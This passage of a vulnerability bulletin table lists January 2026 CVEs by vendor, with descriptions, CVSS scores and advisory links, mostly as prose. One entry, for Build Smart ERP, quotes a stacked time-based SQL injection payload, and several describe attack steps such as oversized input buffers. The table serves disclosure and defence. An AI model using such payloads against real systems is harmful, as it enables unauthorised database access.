| Primera--PTPublisher | PTPublisher 2.3.4 contains an unquoted service path vulnerability in the PTProtect service that allows local attackers to potentially execute arbitrary code with elevated privileges. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Primera Technology\PTPublisher\UsbFlashDongleService.exe' to inject malicious executables and gain system-level access. | 2026-01-13 | 8.4 | CVE-2022-50915 | ExploitDB-50885 Primera Technology Official Homepage VulnCheck Advisory: PTPublisher 2.3.4 - Unquoted Service Path |
| Private Internet Access--Private Internet Access | Private Internet Access 3.3 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted path in the service configuration to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-13 | 8.4 | CVE-2022-50924 | ExploitDB-50804 Vendor Homepage Software Download Page VulnCheck Advisory: Private Internet Access 3.3 - 'pia-service' Unquoted Service Path |
| Progress Software--Flowmon ADS | An SQL injection vulnerability in Progress Flowmon ADS versions prior to 12.5.4 and 13.0.1 allows authenticated users to execute unintended SQL queries and commands. | 2026-01-13 | 8.8 | CVE-2025-13774 | https://community.progress.com/s/article/Flowmon-ADS-CVE-2025-13774 |
| Progress Software--LoadMaster | OS Command Injection Remote Code Execution Vulnerability in the API of Progress LoadMaster allows an authenticated attacker with "User Administration" permissions to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in the API input parameters. | 2026-01-13 | 8.4 | CVE-2025-13444 | https://community.progress.com/s/article/LoadMaster-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/ECS-Connection-Manager-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/Connection-Manager-for-ObjectScale-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/MOVEit-WAF-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 |
| Progress Software--LoadMaster | OS Command Injection Remote Code Execution Vulnerability in the API of Progress LoadMaster allows an authenticated attacker with "User Administration" permissions to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in the API input parameters. | 2026-01-13 | 8.4 | CVE-2025-13447 | https://community.progress.com/s/article/LoadMaster-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/ECS-Connection-Manager-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/Connection-Manager-for-ObjectScale-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 https://community.progress.com/s/article/MOVEit-WAF-Vulnerabilities-CVE-2025-13444-CVE-2025-13447 |
| Projeqtor--ProjeQtOr Project Management | ProjeQtOr Project Management 9.1.4 contains a file upload vulnerability that allows guest users to upload malicious PHP files with arbitrary code execution capabilities. Attackers can upload a PHP script through the profile attachment section and execute system commands by accessing the uploaded file with a specially crafted request parameter. | 2026-01-15 | 9.8 | CVE-2021-47819 | ExploitDB-49919 ProjeQtOr Official Website |
| ProtonVPN--ProtonVPN | ProtonVPN 1.26.0 contains an unquoted service path vulnerability in its WireGuard service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path by placing malicious executables in specific file system locations to gain elevated privileges during service startup. | 2026-01-13 | 8.4 | CVE-2022-50917 | ExploitDB-50837 ProtonVPN Official Website VulnCheck Advisory: ProtonVPN 1.26.0 - Unquoted Service Path |
| Prowise--Prowise Reflect | Prowise Reflect version 1.0.9 contains a remote keystroke injection vulnerability that allows attackers to send keyboard events through an exposed WebSocket on port 8082. Attackers can craft malicious web pages to inject keystrokes, opening applications and typing arbitrary text by sending specific WebSocket messages. | 2026-01-13 | 9.8 | CVE-2022-50925 | ExploitDB-50796 Prowise Official Homepage VulnCheck Advisory: Prowise Reflect v1.0.9 - Remote Keystroke Injection |
| pyasn1--pyasn1 | pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a malformed RELATIVE-OID with excessive continuation octets leads to memory exhaustion and thus denial of service. This vulnerability is fixed in 0.6.2. | 2026-01-16 | 7.5 | CVE-2026-23490 | https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970 https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2 |
| Pysoft--Active WebCam | Active WebCam 11.5 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the misconfigured service path by placing malicious executables in specific directory locations to gain administrative access. | 2026-01-15 | 7.8 | CVE-2021-47790 | ExploitDB-50273 Software Download Page Vendor Homepage VulnCheck Advisory: Active WebCam 11.5 - Unquoted Service Path |
| Raimersoft--RarmaRadio | RarmaRadio 2.72.8 contains a denial of service vulnerability that allows attackers to crash the application by overflowing network configuration fields with large character buffers. Attackers can generate a 100,000 character buffer and paste it into multiple network settings fields to trigger application instability and potential crash. | 2026-01-16 | 7.5 | CVE-2021-47821 | ExploitDB-49906 Vendor Homepage VulnCheck Advisory: RarmaRadio 2.72.8 - Denial of Service |
| Red Hat--Red Hat OpenShift Dev Spaces (RHOSDS) 3.22 | A flaw was found in Eclipse Che che-machine-exec. This vulnerability allows unauthenticated remote arbitrary command execution and secret exfiltration (SSH keys, tokens, etc.) from other users' Developer Workspace containers, via an unauthenticated JSON-RPC / websocket API exposed on TCP port 3333. | 2026-01-13 | 9 | CVE-2025-12548 | RHSA-2025:22620 RHSA-2025:22623 RHSA-2025:22652 https://access.redhat.com/security/cve/CVE-2025-12548 RHBZ#2408850 |
| Redragon--Redragon Gaming Mouse | Redragon Gaming Mouse driver contains a kernel-level vulnerability that allows attackers to trigger a denial of service by sending malformed IOCTL requests. Attackers can send a crafted 2000-byte buffer with specific byte patterns to the REDRAGON_MOUSE device to crash the kernel driver. | 2026-01-15 | 7.5 | CVE-2021-47786 | ExploitDB-50322 Vendor Download Page Vulnerability Research Repository VulnCheck Advisory: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC) |
| Remotemouse--Remote Mouse | Remote Mouse 4.002 contains an unquoted service path vulnerability that allows local attackers to execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path in the RemoteMouseService to inject malicious executables and gain administrative access. | 2026-01-15 | 7.8 | CVE-2021-47792 | ExploitDB-50258 Official Vendor Homepage VulnCheck Advisory: Remote Mouse 4.002 - Unquoted Service Path |
| Ribccs--Build Smart ERP | Build Smart ERP 21.0817 contains an unauthenticated SQL injection vulnerability in the 'eidValue' parameter of the login validation endpoint. Attackers can inject stacked SQL queries using payloads like ';WAITFOR DELAY '0:0:3'-- to manipulate database queries and potentially extract or modify database information. | 2026-01-15 | 8.2 | CVE-2021-47777 | ExploitDB-50445 Build Smart ERP Vendor Homepage |
| risesoft-y9--Digital-Infrastructure | A flaw has been found in risesoft-y9 Digital-Infrastructure up to 9.6.7. It affects an unspecified function in the file source-code/src/main/java/net/risesoft/util/Y9PlatformUtil.java of the REST Authenticate Endpoint component, where manipulated input can lead to SQL injection. The attack can be launched remotely. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-17 | 7.3 | CVE-2026-1050 | VDB-341603 (risesoft-y9 Digital-Infrastructure REST Authenticate Endpoint Y9PlatformUtil.java SQL injection); CTI Indicators (IOB, IOC, TTP, IOA); Submit #731010; risesoft-y9 Digital-Infrastructure <=9.6.7 SQL Injection https://github.com/risesoft-y9/Digital-Infrastructure/issues/2 https://github.com/risesoft-y9/Digital-Infrastructure/issues/2#issue-3777863959 |
| RocketChat--Rocket.Chat | Rocket.Chat is an open-source, secure, fully customizable communications platform. In Rocket.Chat versions before 6.12.0, the API endpoint GET /api/v1/oauth-apps.get is exposed to any authenticated user, regardless of their role or permissions. As long as the user knows the application's ID, the endpoint returns the OAuth application, including potentially sensitive fields such as client_id and client_secret. This vulnerability is fixed in 6.12.0. | 2026-01-14 | 7.7 | CVE-2026-23477 | https://github.com/RocketChat/Rocket.Chat/security/advisories/GHSA-g4wm-fg3c-g4p2 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. Prior to 8.2.8.2, command injection vulnerability exists in the log viewing functionality that allows authenticated users to execute arbitrary system commands. The vulnerability is in app/modules/roxywi/logs.py line 87, where the grep parameter is used twice - once sanitized and once raw. This vulnerability is fixed in 8.2.8.2. | 2026-01-15 | 7.5 | CVE-2026-22265 | https://github.com/roxy-wi/roxy-wi/security/advisories/GHSA-mmmf-vh7m-rm47 https://github.com/roxy-wi/roxy-wi/commit/f040d3338c4ba6f66127487361592e32e0188eee https://github.com/roxy-wi/roxy-wi/releases/tag/v8.2.8.2 |
| Sandboxie--Sandboxie Plus | Sandboxie-Plus 5.50.2 contains an unquoted service path vulnerability in the SbieSvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with LocalSystem privileges during service startup. | 2026-01-13 | 8.4 | CVE-2022-50920 | ExploitDB-50819 Official Sandboxie-Plus Product Homepage VulnCheck Advisory: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path |
| Sandboxie-Plus--Sandboxie | Sandboxie 5.49.7 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the container folder input field. Attackers can paste a large buffer of repeated characters into the Sandbox container folder setting to trigger an application crash. | 2026-01-16 | 7.5 | CVE-2021-47831 | ExploitDB-49844 Sandboxie Official Homepage VulnCheck Advisory: Sandboxie 5.49.7 - Denial of Service |
| SAP_SE--SAP Application Server for ABAP and SAP NetWeaver RFCSDK | Due to an OS Command Injection vulnerability in SAP Application Server for ABAP and SAP NetWeaver RFCSDK, an authenticated attacker with administrative access and adjacent network access could upload specially crafted content to the server. If processed by the application, this content enables execution of arbitrary operating system commands. Successful exploitation could lead to full compromise of the system's confidentiality, integrity, and availability. | 2026-01-13 | 8.4 | CVE-2026-0507 | https://me.sap.com/notes/3675151 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Fiori App (Intercompany Balance Reconciliation) | SAP Fiori App Intercompany Balance Reconciliation does not perform the necessary authorization checks for an authenticated user, resulting in escalation of privileges. This has a high impact on the confidentiality and integrity of the application; availability is not impacted. | 2026-01-13 | 8.1 | CVE-2026-0511 | https://me.sap.com/notes/3565506 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP HANA database | SAP HANA database is vulnerable to privilege escalation, allowing an attacker with valid credentials of any user to switch to another user, potentially gaining administrative access. This exploit could result in a total compromise of the system's confidentiality, integrity, and availability. | 2026-01-13 | 8.8 | CVE-2026-0492 | https://me.sap.com/notes/3691059 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Landscape Transformation | SAP Landscape Transformation allows an attacker with admin privileges to exploit a vulnerability in the function module exposed via RFC. This flaw enables the injection of arbitrary ABAP code/OS commands into the system, bypassing essential authorization checks. This vulnerability effectively functions as a backdoor, creating the risk of full system compromise, undermining the confidentiality, integrity and availability of the system. | 2026-01-13 | 9.1 | CVE-2026-0491 | https://me.sap.com/notes/3697979 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP NetWeaver Application Server ABAP and ABAP Platform | Due to a Missing Authorization Check vulnerability in Application Server ABAP and ABAP Platform, an authenticated attacker could misuse an RFC function to execute form routines (FORMs) in the ABAP system. Successful exploitation could allow the attacker to write or modify data accessible via FORMs and invoke system functionality exposed via FORMs, resulting in a high impact on integrity and availability, while confidentiality remains unaffected. | 2026-01-13 | 8.1 | CVE-2026-0506 | https://me.sap.com/notes/3688703 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP S/4HANA (Private Cloud and On-Premise) | SAP S/4HANA (Private Cloud and On-Premise) allows an attacker with admin privileges to exploit a vulnerability in the function module exposed via RFC. This flaw enables the injection of arbitrary ABAP code/OS commands into the system, bypassing essential authorization checks. This vulnerability effectively functions as a backdoor, creating the risk of full system compromise, undermining the confidentiality, integrity and availability of the system. | 2026-01-13 | 9.1 | CVE-2026-0498 | https://me.sap.com/notes/3694242 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP S/4HANA Private Cloud and On-Premise (Financials General Ledger) | Due to insufficient input validation in SAP S/4HANA Private Cloud and On-Premise (Financials General Ledger), an authenticated user could execute crafted SQL queries to read, modify, and delete backend database data. This leads to a high impact on the confidentiality, integrity, and availability of the application. | 2026-01-13 | 9.9 | CVE-2026-0501 | https://me.sap.com/notes/3687749 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Wily Introscope Enterprise Manager (WorkStation) | Due to the use of a vulnerable third-party component in SAP Wily Introscope Enterprise Manager (WorkStation), an unauthenticated attacker could create a malicious JNLP (Java Network Launch Protocol) file accessible via a public-facing URL. When a victim clicks on the URL, the accessed Wily Introscope Server could execute OS commands on the victim's machine. This could completely compromise the confidentiality, integrity and availability of the system. | 2026-01-13 | 9.6 | CVE-2026-0500 | https://me.sap.com/notes/3668679 https://url.sap/sapsecuritypatchday |
| shopware--shopware | Shopware is an open commerce platform. From 6.7.0.0 to before 6.7.6.1, a regression of CVE-2023-2017 leads to arrays and crafted PHP Closures not being checked against the allow list for the map(...) override. This vulnerability is fixed in 6.7.6.1. | 2026-01-14 | 7.2 | CVE-2026-23498 | https://github.com/shopware/shopware/security/advisories/GHSA-7cw6-7h3h-v8pf https://github.com/shopware/shopware/commit/3966b05590e29432b8485ba47b4fcd14dd0b8475 |
| SICK AG--Incoming Goods Suite | A security vulnerability in the Grafana /apis/dashboard.grafana.app/* endpoints allows authenticated users to bypass dashboard and folder permissions. The vulnerability affects all API versions (v0alpha1, v1alpha1, v2alpha1). Impact: viewers can view all dashboards/folders regardless of permissions; editors can view/edit/delete all dashboards/folders regardless of permissions; editors can create dashboards in any folder regardless of permissions; anonymous users with viewer/editor roles are similarly affected. Organization isolation boundaries remain intact. The vulnerability only affects dashboard access and does not grant access to datasources. | 2026-01-15 | 8.3 | CVE-2026-0713 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | A cross-site scripting (XSS) vulnerability exists in Grafana caused by combining a client-side path traversal and an open redirect. This allows attackers to redirect users to a website that hosts a frontend plugin that will execute arbitrary JavaScript. This vulnerability does not require editor permissions, and if anonymous access is enabled, the XSS works without authentication. If the Grafana Image Renderer plugin is installed, it is possible to exploit the open redirect to achieve a full-read SSRF. The default Content-Security-Policy (CSP) in Grafana will block the XSS through the `connect-src` directive. | 2026-01-15 | 8.3 | CVE-2026-22638 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | In Grafana before 11.6.2, an excessively long dashboard title or panel name causes Chromium-based browsers to become unresponsive, due to an Improper Input Validation vulnerability in Grafana. This issue is fixed in 11.6.2 and higher. | 2026-01-15 | 8.3 | CVE-2026-22643 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--Incoming Goods Suite | An open redirect vulnerability has been identified in Grafana OSS that can be exploited to achieve XSS attacks. The vulnerability was introduced in Grafana v11.5.0. The open redirect can be chained with path traversal vulnerabilities to achieve XSS. Fixed in versions 12.0.2+security-01, 11.6.3+security-01, 11.5.6+security-01, 11.4.6+security-01 and 11.3.8+security-01. | 2026-01-15 | 7.6 | CVE-2026-0712 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0002.pdf |
| SICK AG--TDC-X401GL | An attacker may gain unauthorized access to the host filesystem, potentially allowing them to read and modify system data. | 2026-01-15 | 9.9 | CVE-2026-22907 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Uploading unvalidated container images may allow remote attackers to gain full access to the system, potentially compromising its integrity and confidentiality. | 2026-01-15 | 9.1 | CVE-2026-22908 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | Certain system functions may be accessed without proper authorization, allowing attackers to start, stop, or delete installed applications, potentially disrupting system operations. | 2026-01-15 | 7.5 | CVE-2026-22909 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| SICK AG--TDC-X401GL | The device is deployed with weak and publicly known default passwords for certain hidden user levels, increasing the risk of unauthorized access. This represents a high risk to the integrity of the system. | 2026-01-15 | 7.5 | CVE-2026-22910 | https://sick.com/psirt https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf https://www.cisa.gov/resources-tools/resources/ics-recommended-practices https://www.first.org/cvss/calculator/3.1 https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf |
| Siemens--Industrial Edge Cloud Device (IECD) | Affected devices do not properly enforce user authentication on specific API endpoints. This could allow an unauthenticated remote attacker to circumvent authentication and impersonate a legitimate user. Successful exploitation requires that the attacker has learned the identity of a legitimate user. | 2026-01-13 | 10 | CVE-2025-40805 | https://cert-portal.siemens.com/productcert/html/ssa-014678.html https://cert-portal.siemens.com/productcert/html/ssa-001536.html |
| Siemens--SIMATIC ET 200AL IM 157-1 PN | A vulnerability has been identified in SIMATIC ET 200AL IM 157-1 PN (6ES7157-1AB00-0AB0) (All versions), SIMATIC ET 200MP IM 155-5 PN HF (6ES7155-5AA00-0AC0) (All versions >= V4.2.0), SIMATIC ET 200SP IM 155-6 MF HF (6ES7155-6MU00-0CN0) (All versions), SIMATIC ET 200SP IM 155-6 PN HA (incl. SIPLUS variants) (All versions < V1.3), SIMATIC ET 200SP IM 155-6 PN R1 (6ES7155-6AU00-0HM0) (All versions < V6.0.1), SIMATIC ET 200SP IM 155-6 PN/2 HF (6ES7155-6AU01-0CN0) (All versions >= V4.2.0), SIMATIC ET 200SP IM 155-6 PN/3 HF (6ES7155-6AU30-0CN0) (All versions < V4.2.2), SIMATIC PN/MF Coupler (6ES7158-3MU10-0XA0) (All versions), SIMATIC PN/PN Coupler (6ES7158-3AD10-0XA0) (All versions < V6.0.0), SIPLUS ET 200MP IM 155-5 PN HF (6AG1155-5AA00-2AC0) (All versions >= V4.2.0), SIPLUS ET 200MP IM 155-5 PN HF (6AG1155-5AA00-7AC0) (All versions >= V4.2.0), SIPLUS ET 200MP IM 155-5 PN HF T1 RAIL (6AG2155-5AA00-1AC0) (All versions >= V4.2.0), SIPLUS ET 200SP IM 155-6 PN HF (6AG1155-6AU01-2CN0) (All versions >= V4.2.0), SIPLUS ET 200SP IM 155-6 PN HF (6AG1155-6AU01-7CN0) (All versions >= V4.2.0), SIPLUS ET 200SP IM 155-6 PN HF T1 RAIL (6AG2155-6AU01-1CN0) (All versions >= V4.2.0), SIPLUS ET 200SP IM 155-6 PN HF TX RAIL (6AG2155-6AU01-4CN0) (All versions >= V4.2.0), SIPLUS NET PN/PN Coupler (6AG2158-3AD10-4XA0) (All versions < V6.0.0). Affected devices do not properly handle S7 protocol session disconnect requests. When receiving a valid S7 protocol Disconnect Request (COTP DR TPDU) on TCP port 102, the devices enter an improper session state. This could allow an attacker to cause the device to become unresponsive, leading to a denial-of-service condition that requires a power cycle to restore normal operation. | 2026-01-13 | 7.5 | CVE-2025-40944 | https://cert-portal.siemens.com/productcert/html/ssa-674753.html |
| Siemens--TeleControl Server Basic | A vulnerability has been identified in TeleControl Server Basic (All versions < V3.1.2.4). The affected application contains a local privilege escalation vulnerability that could allow an attacker to run arbitrary code with elevated privileges. | 2026-01-13 | 8.8 | CVE-2025-40942 | https://cert-portal.siemens.com/productcert/html/ssa-192617.html |
| Skyjos--Owlfiles File Manager | Owlfiles File Manager 12.0.1 contains a path traversal vulnerability in its built-in HTTP server that allows attackers to access system directories. Attackers can exploit the vulnerability by crafting GET requests with directory traversal sequences to access restricted system directories on the device. | 2026-01-13 | 7.5 | CVE-2022-50890 | ExploitDB-51036 Vendor Homepage Official App Store Listing VulnCheck Advisory: Owlfiles File Manager 12.0.1 - Path Traversal |
| SLIMS--Senayan Library Management System | Senayan Library Management System 9.0.0 contains a SQL injection vulnerability in the 'class' parameter that allows attackers to inject malicious SQL queries. Attackers can exploit the vulnerability by submitting crafted payloads to manipulate database queries and potentially extract sensitive information. | 2026-01-13 | 8.2 | CVE-2022-50805 | ExploitDB-51161 Senayan Library Management System Official Website Vulnerability Research Repository VulnCheck Advisory: Senayan Library Management System 9.0.0 - SQL Injection |
| Smartertools--SmarterTools SmarterTrack | SmarterTrack 7922 contains an information disclosure vulnerability in the Chat Management search form that reveals agent identification details. Attackers can access the vulnerable /Management/Chat/frmChatSearch.aspx endpoint to retrieve agents' first and last names along with their unique identifiers. | 2026-01-15 | 7.5 | CVE-2020-36926 | ExploitDB-50328 SmarterTools Official Homepage SmarterTrack Product Page VulnCheck Advisory: SmarterTools SmarterTrack 7922 - Information Disclosure |
| Smartftp--SmartFTP Client | SmartFTP Client 10.0.2909.0 contains multiple denial of service vulnerabilities that allow attackers to crash the application through specific input manipulation. Attackers can trigger crashes by entering malformed paths, using invalid IP addresses, or clearing connection history in the client's interface. | 2026-01-15 | 7.5 | CVE-2021-47791 | ExploitDB-50266 SmartFTP Official Homepage SmartFTP Download Page VulnCheck Advisory: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service |
| SMCI--X12STW-F | There is a vulnerability in the Supermicro BMC firmware validation logic at Supermicro MBD-X12STW-F. An attacker can update the system firmware with a specially crafted image. | 2026-01-16 | 7.2 | CVE-2025-12006 | https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2026 |
| SMCI--X13SEM-F | There is a vulnerability in the Supermicro BMC firmware validation logic at Supermicro MBD-X13SEM-F. An attacker can update the system firmware with a specially crafted image. | 2026-01-16 | 7.2 | CVE-2025-12007 | https://www.supermicro.com/en/support/security_BMC_IPMI_Jan_2026 |
| SMEWebify--WebErpMesv2 | WebErpMesv2 is a web-based resource management and manufacturing execution system for industry. Prior to 1.19, the WebErpMesV2 application exposes multiple sensitive API endpoints without authentication middleware. An unauthenticated remote attacker can read business-critical data including companies, quotes, orders, tasks, and whiteboards. Limited write access allows creation of company records and full manipulation of collaboration whiteboards. This vulnerability is fixed in 1.19. | 2026-01-12 | 8.2 | CVE-2026-22788 | https://github.com/SMEWebify/WebErpMesv2/security/advisories/GHSA-pp68-5pc2-hv7w https://github.com/SMEWebify/WebErpMesv2/commit/3a7ab1c95d1d1c8f7c62c84bc87b3666ecd2fa23 |
| Softlink Education--Oliver Library Server | Oliver Library Server v5 contains a file download vulnerability that allows unauthenticated attackers to access arbitrary system files through unsanitized input in the FileServlet endpoint. Attackers can exploit the vulnerability by manipulating the 'fileName' parameter to download sensitive files from the server's filesystem. | 2026-01-15 | 9.8 | CVE-2021-47755 | ExploitDB-50599 Oliver Library Server Official Product Homepage |
| Splashtop--Splashtop | Splashtop 8.71.12001.0 contains an unquoted service path vulnerability in the Splashtop Software Updater Service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in C:\Program Files (x86)\Splashtop\Splashtop Software Updater\ to inject malicious executables and escalate privileges. | 2026-01-13 | 8.4 | CVE-2022-50693 | ExploitDB-51182 Splashtop Official Homepage VulnCheck Advisory: Splashtop 8.71.12001.0 - Unquoted Service Path |
| Splinterware--iDailyDiary | iDailyDiary 4.30 contains a denial of service vulnerability that allows attackers to crash the application by overflowing the preferences tab name field. Attackers can paste a 2,000,000 character buffer into the default diary tab name to trigger an application crash. | 2026-01-16 | 7.5 | CVE-2021-47824 | ExploitDB-49898 Vendor Homepage VulnCheck Advisory: iDailyDiary 4.30 - Denial of Service (PoC) |
| Spy-Emergency--Spy Emergency | Spy Emergency 25.0.650 contains an unquoted service path vulnerability in its Windows service configurations that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted file paths in SpyEmergencyHealth.exe and SpyEmergencySrv.exe to inject malicious code during system startup or service restart. | 2026-01-16 | 7.8 | CVE-2021-47845 | ExploitDB-49997 Vendor Homepage VulnCheck Advisory: Spy Emergency 25.0.650 - Unquoted Service Path |
| stellarwp--Membership Plugin Restrict Content | The Membership Plugin - Restrict Content plugin for WordPress is vulnerable to Missing Authentication in all versions up to, and including, 3.2.16 via the 'rcp_stripe_create_setup_intent_for_saved_card' function due to missing capability check. Additionally, the plugin does not check a user-controlled key, which makes it possible for unauthenticated attackers to leak Stripe SetupIntent client_secret values for any membership. | 2026-01-16 | 8.2 | CVE-2025-14844 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c28545d-c7cd-469f-bccf-90e8b52fd4e7?source=cve https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/gateways/stripe/functions.php#L848 https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/gateways/stripe/functions.php#L987 https://docs.stripe.com/api/setup_intents/object https://cwe.mitre.org/data/definitions/639.html https://plugins.trac.wordpress.org/changeset/3438168/restrict-content/tags/3.2.17/core/includes/gateways/stripe/functions.php |
| strongSwan--strongSwan | In the eap-mschapv2 plugin (client-side) in strongSwan before 6.0.3, a malicious EAP-MSCHAPv2 server can send a crafted message of size 6 through 8, and cause an integer underflow that potentially results in a heap-based buffer overflow. | 2026-01-16 | 8.1 | CVE-2025-62291 | https://github.com/strongswan/strongswan/releases https://github.com/strongswan/strongswan/commits/master/src/libcharon/plugins/eap_mschapv2 https://www.strongswan.org/blog/2025/10/27/strongswan-vulnerability-%28cve-2025-62291%29.html |
| suitenumerique--docs | LaSuite Doc is a collaborative note taking, wiki and documentation platform. From 3.8.0 to 4.3.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Interlinking feature. When a user creates a link to another document within the editor, the URL of that link is not validated. An attacker with document editing privileges can inject a malicious javascript: URL that executes arbitrary code when other users click on the link. This vulnerability is fixed in 4.4.0. | 2026-01-15 | 8.7 | CVE-2026-22867 | https://github.com/suitenumerique/docs/security/advisories/GHSA-4rwv-ghwh-9rv6 https://github.com/suitenumerique/docs/commit/e807237dbedbc189230296b81c3aeccc1c04fa77 https://github.com/suitenumerique/docs/releases/tag/v4.4.0 |
| sumatrapdfreader--sumatrapdf | SumatraPDF is a multi-format reader for Windows. In 3.5.2 and earlier, there is an Untrusted Search Path vulnerability when the Advanced Options setting is triggered. The application executes notepad.exe without specifying an absolute path when using the Advanced Options setting. On Windows, this allows execution of a malicious notepad.exe placed in the application's installation directory, leading to arbitrary code execution. | 2026-01-14 | 8.6 | CVE-2026-23512 | https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-rqg5-gj63-x4mv https://github.com/sumatrapdfreader/sumatrapdf/commit/2762e02a8cd7cb779c934a44257aac56ab7de673 |
| Support--Brother BRPrint Auditor | Brother BRPrint Auditor 3.0.7 contains an unquoted service path vulnerability in its Windows service configurations that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted file paths in BrAuSvc and BRPA_Agent services to inject malicious executables and escalate privileges on the system. | 2026-01-15 | 7.8 | CVE-2020-36929 | ExploitDB-50005 Brother BRPrint Auditor Download Page (NL) Brother BRPrint Auditor Download Page (FR) VulnCheck Advisory: Brother BRPrint Auditor 3.0.7 - 'Multiple' Unquoted Service Path |
